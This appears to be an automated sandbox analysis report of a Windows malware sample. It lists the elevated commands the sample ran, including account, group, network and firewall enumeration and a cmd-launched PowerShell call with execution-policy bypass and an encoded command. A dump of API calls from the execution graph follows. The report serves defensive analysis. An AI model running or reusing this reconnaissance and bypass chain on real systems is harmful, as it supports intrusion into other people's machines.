                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net localgroup
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net localgroup administrators
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net user guest
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                                            Start time:18:38:44
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net user administrator
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                                            Start time:18:38:44
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                                            Start time:18:38:44
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /svc
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:ipconfig /all
                                                                                                                                                                                                                                            Imagebase:0x7ff63f900000
                                                                                                                                                                                                                                            File size:35'840 bytes
                                                                                                                                                                                                                                            MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:route print
                                                                                                                                                                                                                                            Imagebase:0x7ff656ef0000
                                                                                                                                                                                                                                            File size:24'576 bytes
                                                                                                                                                                                                                                            MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:arp -a
                                                                                                                                                                                                                                            Imagebase:0x7ff7598b0000
                                                                                                                                                                                                                                            File size:26'624 bytes
                                                                                                                                                                                                                                            MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netstat -ano
                                                                                                                                                                                                                                            Imagebase:0x7ff7dd870000
                                                                                                                                                                                                                                            File size:39'936 bytes
                                                                                                                                                                                                                                            MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                                                                            Start time:18:38:45
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:sc query type= service state= all
                                                                                                                                                                                                                                            Imagebase:0x7ff75f950000
                                                                                                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                                            Start time:18:38:46
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh firewall show state
                                                                                                                                                                                                                                            Imagebase:0x7ff69f960000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                                            Start time:18:38:46
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh firewall show config
                                                                                                                                                                                                                                            Imagebase:0x7ff69f960000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                                            Start time:18:38:47
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                                            Start time:18:38:47
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                                            Start time:18:38:47
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                                            Start time:18:38:48
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                                            Start time:18:38:48
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                                            Start time:18:38:48
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:10.3%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:17.1%
                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                              Total number of Limit Nodes:29
17063->17398 17073 7ff62c109b43 17072->17073 17074 7ff62c109b64 17072->17074 17073->16918 19439 7ff62c10a3d8 17074->19439 17078 7ff62c0fd2c9 17077->17078 17078->16926 17080 7ff62c0fcfa1 17079->17080 17081 7ff62c0fcd60 17080->17081 17082 7ff62c0fd888 7 API calls 17080->17082 17081->16916 17082->17081 17084 7ff62c0fd152 _isindst memcpy_s 17083->17084 17085 7ff62c0fd171 RtlCaptureContext RtlLookupFunctionEntry 17084->17085 17086 7ff62c0fd19a RtlVirtualUnwind 17085->17086 17087 7ff62c0fd1d6 memcpy_s 17085->17087 17086->17087 17088 7ff62c0fd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17087->17088 17089 7ff62c0fd256 _isindst 17088->17089 17089->16914 17091 7ff62c0fd890 17090->17091 17092 7ff62c0fd89a 17090->17092 17096 7ff62c0fdc24 17091->17096 17092->16932 17097 7ff62c0fdc33 17096->17097 17098 7ff62c0fd895 17096->17098 17104 7ff62c0fde60 17097->17104 17100 7ff62c0fdc90 17098->17100 17101 7ff62c0fdcbb 17100->17101 17102 7ff62c0fdcbf 17101->17102 17103 7ff62c0fdc9e DeleteCriticalSection 17101->17103 17102->17092 17103->17101 17108 7ff62c0fdcc8 17104->17108 17109 7ff62c0fddb2 TlsFree 17108->17109 17114 7ff62c0fdd0c __vcrt_InitializeCriticalSectionEx 17108->17114 17110 7ff62c0fdd3a LoadLibraryExW 17112 7ff62c0fdd5b GetLastError 17110->17112 17113 7ff62c0fddd9 17110->17113 17111 7ff62c0fddf9 GetProcAddress 17111->17109 17112->17114 17113->17111 17115 7ff62c0fddf0 FreeLibrary 17113->17115 17114->17109 17114->17110 17114->17111 17116 7ff62c0fdd7d LoadLibraryExW 17114->17116 17115->17111 17116->17113 17116->17114 17118 7ff62c11a4c0 17117->17118 17118->16937 17118->17118 17122 7ff62c10f480 17119->17122 17120 7ff62c10f4d3 17121 7ff62c10a814 _invalid_parameter_noinfo 37 API calls 17120->17121 17125 7ff62c10f4fc 17121->17125 17122->17120 17123 7ff62c10f526 17122->17123 17429 7ff62c10f358 17123->17429 17125->16941 17437 7ff62c0fc850 17126->17437 17129 7ff62c0f3710 17439 7ff62c0f9280 FindFirstFileExW 17129->17439 17130 7ff62c0f36eb GetLastError 17444 
7ff62c0f2c50 17130->17444 17134 7ff62c0f3723 17459 7ff62c0f9300 CreateFileW 17134->17459 17135 7ff62c0f377d 17470 7ff62c0f9440 17135->17470 17136 7ff62c0fc550 _log10_special 8 API calls 17139 7ff62c0f37b5 17136->17139 17139->17061 17148 7ff62c0f1950 17139->17148 17141 7ff62c0f378b 17144 7ff62c0f2810 49 API calls 17141->17144 17147 7ff62c0f3706 17141->17147 17142 7ff62c0f3734 17462 7ff62c0f2810 17142->17462 17144->17147 17146 7ff62c0f374c __vcrt_InitializeCriticalSectionEx 17146->17135 17147->17136 17149 7ff62c0f45c0 108 API calls 17148->17149 17150 7ff62c0f1985 17149->17150 17151 7ff62c0f1c43 17150->17151 17152 7ff62c0f7f90 83 API calls 17150->17152 17153 7ff62c0fc550 _log10_special 8 API calls 17151->17153 17154 7ff62c0f19cb 17152->17154 17155 7ff62c0f1c5e 17153->17155 17197 7ff62c0f1a03 17154->17197 17815 7ff62c1006d4 17154->17815 17155->16947 17155->16948 17157 7ff62c10004c 74 API calls 17157->17151 17158 7ff62c0f19e5 17159 7ff62c0f1a08 17158->17159 17160 7ff62c0f19e9 17158->17160 17819 7ff62c10039c 17159->17819 17161 7ff62c104f08 _get_daylight 11 API calls 17160->17161 17163 7ff62c0f19ee 17161->17163 17822 7ff62c0f2910 17163->17822 17165 7ff62c0f1a45 17171 7ff62c0f1a5c 17165->17171 17172 7ff62c0f1a7b 17165->17172 17166 7ff62c0f1a26 17168 7ff62c104f08 _get_daylight 11 API calls 17166->17168 17169 7ff62c0f1a2b 17168->17169 17170 7ff62c0f2910 54 API calls 17169->17170 17170->17197 17173 7ff62c104f08 _get_daylight 11 API calls 17171->17173 17174 7ff62c0f1c80 49 API calls 17172->17174 17175 7ff62c0f1a61 17173->17175 17176 7ff62c0f1a92 17174->17176 17178 7ff62c0f2910 54 API calls 17175->17178 17177 7ff62c0f1c80 49 API calls 17176->17177 17179 7ff62c0f1add 17177->17179 17178->17197 17180 7ff62c1006d4 73 API calls 17179->17180 17181 7ff62c0f1b01 17180->17181 17182 7ff62c0f1b35 17181->17182 17183 7ff62c0f1b16 17181->17183 17185 7ff62c10039c _fread_nolock 53 API calls 17182->17185 17184 7ff62c104f08 _get_daylight 11 API calls 17183->17184 17186 7ff62c0f1b1b 17184->17186 
17187 7ff62c0f1b4a 17185->17187 17188 7ff62c0f2910 54 API calls 17186->17188 17189 7ff62c0f1b50 17187->17189 17190 7ff62c0f1b6f 17187->17190 17188->17197 17192 7ff62c104f08 _get_daylight 11 API calls 17189->17192 17837 7ff62c100110 17190->17837 17193 7ff62c0f1b55 17192->17193 17195 7ff62c0f2910 54 API calls 17193->17195 17195->17197 17196 7ff62c0f2710 54 API calls 17196->17197 17197->17157 17199 7ff62c0f883a 17198->17199 17200 7ff62c0f9390 2 API calls 17199->17200 17201 7ff62c0f8859 GetEnvironmentVariableW 17200->17201 17202 7ff62c0f88c2 17201->17202 17203 7ff62c0f8876 ExpandEnvironmentStringsW 17201->17203 17205 7ff62c0fc550 _log10_special 8 API calls 17202->17205 17203->17202 17204 7ff62c0f8898 17203->17204 17206 7ff62c0f9440 2 API calls 17204->17206 17207 7ff62c0f88d4 17205->17207 17208 7ff62c0f88aa 17206->17208 17207->16957 17209 7ff62c0fc550 _log10_special 8 API calls 17208->17209 17210 7ff62c0f88ba 17209->17210 17210->16957 17212 7ff62c0f90f5 17211->17212 18052 7ff62c0f8570 GetCurrentProcess OpenProcessToken 17212->18052 17215 7ff62c0f8570 7 API calls 17216 7ff62c0f9121 17215->17216 17217 7ff62c0f9154 17216->17217 17218 7ff62c0f913a 17216->17218 17220 7ff62c0f26b0 48 API calls 17217->17220 17219 7ff62c0f26b0 48 API calls 17218->17219 17221 7ff62c0f9152 17219->17221 17222 7ff62c0f9167 LocalFree LocalFree 17220->17222 17221->17222 17223 7ff62c0f9183 17222->17223 17225 7ff62c0f918f 17222->17225 18062 7ff62c0f2b50 17223->18062 17226 7ff62c0fc550 _log10_special 8 API calls 17225->17226 17227 7ff62c0f3c55 17226->17227 17227->17002 17228 7ff62c0f8660 17227->17228 17229 7ff62c0f8678 17228->17229 17230 7ff62c0f869c 17229->17230 17231 7ff62c0f86fa GetTempPathW GetCurrentProcessId 17229->17231 17233 7ff62c0f8830 14 API calls 17230->17233 18071 7ff62c0f25c0 17231->18071 17234 7ff62c0f86a8 17233->17234 18078 7ff62c0f81d0 17234->18078 17239 7ff62c0f86e8 __std_exception_destroy 17260 7ff62c0f87d4 __std_exception_destroy 17239->17260 17240 7ff62c0f8728 
__std_exception_destroy 17251 7ff62c0f8765 __std_exception_destroy 17240->17251 18075 7ff62c108b68 17240->18075 17246 7ff62c0fc550 _log10_special 8 API calls 17247 7ff62c0f3cbb 17246->17247 17247->17002 17247->17014 17252 7ff62c0f9390 2 API calls 17251->17252 17251->17260 17253 7ff62c0f87b1 17252->17253 17254 7ff62c0f87e9 17253->17254 17255 7ff62c0f87b6 17253->17255 17257 7ff62c108238 38 API calls 17254->17257 17256 7ff62c0f9390 2 API calls 17255->17256 17258 7ff62c0f87c6 17256->17258 17257->17260 17259 7ff62c108238 38 API calls 17258->17259 17259->17260 17260->17246 17262 7ff62c0f93b2 MultiByteToWideChar 17261->17262 17263 7ff62c0f93d6 17261->17263 17262->17263 17265 7ff62c0f93ec __std_exception_destroy 17262->17265 17264 7ff62c0f93f3 MultiByteToWideChar 17263->17264 17263->17265 17264->17265 17265->17016 17277 7ff62c0f33ce memcpy_s 17266->17277 17267 7ff62c0fc550 _log10_special 8 API calls 17269 7ff62c0f3664 17267->17269 17268 7ff62c0f35c7 17268->17267 17269->17061 17285 7ff62c0f90c0 LocalFree 17269->17285 17271 7ff62c0f1c80 49 API calls 17271->17277 17272 7ff62c0f35e2 17274 7ff62c0f2710 54 API calls 17272->17274 17274->17268 17277->17268 17277->17271 17277->17272 17278 7ff62c0f35c9 17277->17278 17280 7ff62c0f2a50 54 API calls 17277->17280 17283 7ff62c0f35d0 17277->17283 18362 7ff62c0f4560 17277->18362 18368 7ff62c0f7e20 17277->18368 18379 7ff62c0f1600 17277->18379 18427 7ff62c0f7120 17277->18427 18431 7ff62c0f4190 17277->18431 18475 7ff62c0f4450 17277->18475 17279 7ff62c0f2710 54 API calls 17278->17279 17279->17268 17280->17277 17284 7ff62c0f2710 54 API calls 17283->17284 17284->17268 17287 7ff62c0f1ca5 17286->17287 17288 7ff62c104984 49 API calls 17287->17288 17289 7ff62c0f1cc8 17288->17289 17289->16952 17291 7ff62c0f9390 2 API calls 17290->17291 17292 7ff62c0f89b4 17291->17292 17293 7ff62c108238 38 API calls 17292->17293 17294 7ff62c0f89c6 __std_exception_destroy 17293->17294 17294->16966 17296 7ff62c0f45cc 17295->17296 17297 7ff62c0f9390 2 API calls 
17296->17297 17298 7ff62c0f45f4 17297->17298 17299 7ff62c0f9390 2 API calls 17298->17299 17300 7ff62c0f4607 17299->17300 18642 7ff62c105f94 17300->18642 17303 7ff62c0fc550 _log10_special 8 API calls 17304 7ff62c0f392b 17303->17304 17304->16955 17305 7ff62c0f7f90 17304->17305 17306 7ff62c0f7fb4 17305->17306 17307 7ff62c1006d4 73 API calls 17306->17307 17312 7ff62c0f808b __std_exception_destroy 17306->17312 17308 7ff62c0f7fd0 17307->17308 17308->17312 19033 7ff62c1078c8 17308->19033 17310 7ff62c1006d4 73 API calls 17313 7ff62c0f7fe5 17310->17313 17311 7ff62c10039c _fread_nolock 53 API calls 17311->17313 17312->16959 17313->17310 17313->17311 17313->17312 17315 7ff62c10007c 17314->17315 19048 7ff62c0ffe28 17315->19048 17317 7ff62c100095 17317->16955 17319 7ff62c0fc850 17318->17319 17320 7ff62c0f2734 GetCurrentProcessId 17319->17320 17321 7ff62c0f1c80 49 API calls 17320->17321 17322 7ff62c0f2787 17321->17322 17323 7ff62c104984 49 API calls 17322->17323 17324 7ff62c0f27cf 17323->17324 17325 7ff62c0f2620 12 API calls 17324->17325 17326 7ff62c0f27f1 17325->17326 17327 7ff62c0fc550 _log10_special 8 API calls 17326->17327 17328 7ff62c0f2801 17327->17328 17328->17061 17330 7ff62c0f9390 2 API calls 17329->17330 17331 7ff62c0f895c 17330->17331 17332 7ff62c0f9390 2 API calls 17331->17332 17333 7ff62c0f896c 17332->17333 17334 7ff62c108238 38 API calls 17333->17334 17335 7ff62c0f897a __std_exception_destroy 17334->17335 17335->16969 17337 7ff62c0f1c80 49 API calls 17336->17337 17338 7ff62c0f44fd 17337->17338 17338->16996 17340 7ff62c0f1c80 49 API calls 17339->17340 17341 7ff62c0f4660 17340->17341 17341->17014 17343 7ff62c0f6dd5 17342->17343 17344 7ff62c0f3e64 17343->17344 17345 7ff62c104f08 _get_daylight 11 API calls 17343->17345 17348 7ff62c0f7340 17344->17348 17346 7ff62c0f6de2 17345->17346 17347 7ff62c0f2910 54 API calls 17346->17347 17347->17344 19059 7ff62c0f1470 17348->19059 17350 7ff62c0f7368 17351 7ff62c0f4630 49 API calls 17350->17351 17357 7ff62c0f74b9 
